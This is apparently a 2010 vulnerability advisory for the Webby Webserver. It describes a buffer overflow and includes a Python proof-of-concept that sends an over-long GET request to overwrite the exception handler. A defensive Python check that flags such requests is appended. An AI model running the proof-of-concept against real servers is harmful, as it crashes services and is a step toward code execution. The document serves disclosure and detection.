
Webby Webserver v1.01 - Buffer overflow with overwritten structured exception handler (SEH)






---------------------------------------------

Webby Webserver v1.01
- Buffer overflow vulnerability with overwritten structured exception handler (SEH)
Date: 25.05.2010

---------------------------------------------

- Description

Webby is a small webserver for the Windows operating system.

- Buffer overflow vulnerability

The vulnerability can be triggered by sending a specially crafted HTTP GET request. The payload of the attached POC overwrites the SEH with NOPs.

- Solution

No known solution available.
No contact details of the author found.

- Credits

The vulnerability was discovered by Michael Messner from Integralis
michael#dot#messner#at#integralis#dot#com

- Timeline

25.05.2010 - Vulnerability discovered

- Reference

Download vulnerable software
http://www.shareware.de/webby-webserver/

- POC

#!/usr/bin/python
# Python 2 proof of concept: sends one over-long HTTP GET request.

import socket
import sys

# Both the target address and the port are required.
if len(sys.argv) < 3:
    print "Usage: webby.py <ip> <port>"
    sys.exit(0)

ips = sys.argv[1]
port = int(sys.argv[2])

# 790 filler bytes, 4 NOPs that overwrite the SEH, then 105 bytes of padding.
string = "A"*790
string += "\x90"*4
string += "\x42"*105

method = "GET"
print "starting POC for:", ips
print ""

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect((ips, port))
except socket.error:
    print "no connection possible"
    sys.exit(1)

# Request line: method, absolute URL carrying the long string, HTTP version.
payload = method + ' http://' + ips + '/' + string + ' HTTP/1.0\x0d\x0a\x0d\x0a'

print "\r\nsending payload"
print "\n\rusing method %s with buffersize of: %s" % (method, str(len(string)))
print "..."

print payload
s.send(payload)
s.close()
print "finished with method %s and payload %s" % (method, payload)
print "... check SEH"
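
With no fix available, the over-long GET request described above can at least be recognised in front of the server or in captured traffic. The following Python 3 check is an added example, not part of the original advisory; the function name, the two limits and the sample requests are assumptions constructed for illustration.

```python
import re
from itertools import groupby

MAX_TARGET_LEN = 512  # assumed limit; set it to the longest URL the site really serves
MAX_BYTE_RUN = 64     # assumed limit for one byte value repeated back to back

REQUEST_LINE = re.compile(rb"^([A-Z]+) (\S+) HTTP/\d\.\d$")


def inspect_request(raw, max_target_len=MAX_TARGET_LEN, max_run=MAX_BYTE_RUN):
    """Return a list of findings for the request line of one raw HTTP request."""
    findings = []
    line, sep, _ = raw.partition(b"\r\n")
    if not sep:
        findings.append("unterminated-request-line")
    match = REQUEST_LINE.match(line)
    if match is None:
        findings.append("malformed-request-line")
        if len(line) > max_target_len:
            findings.append("oversized-line:%d" % len(line))
        return findings
    target = match.group(2)
    if len(target) > max_target_len:
        findings.append("oversized-target:%d" % len(target))
    # A URI holds printable ASCII only; raw bytes such as 0x90 would have
    # to be percent-encoded by a well-behaved client.
    odd = sorted({b for b in target if b < 0x21 or b > 0x7E})
    if odd:
        findings.append("non-printable-bytes:" + ",".join("0x%02x" % b for b in odd))
    # Long runs of a single byte value are typical of overflow filler.
    longest = max(len(list(group)) for _, group in groupby(target))
    if longest > max_run:
        findings.append("repeated-byte-run:%d" % longest)
    return findings


# Constructed samples; 192.0.2.10 is a documentation address, not a real host.
BENIGN = b"GET /index.html HTTP/1.0\r\n\r\n"
POC_SHAPED = (b"GET http://192.0.2.10/" + b"A" * 790 + b"\x90" * 4
              + b"\x42" * 105 + b" HTTP/1.0\r\n\r\n")

if __name__ == "__main__":
    for name, raw in (("benign", BENIGN), ("poc-shaped", POC_SHAPED)):
        print(name, inspect_request(raw) or "clean")
```

Any one of the three findings is enough to drop or log the request; the length check alone already rejects a request of the shape the POC sends.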
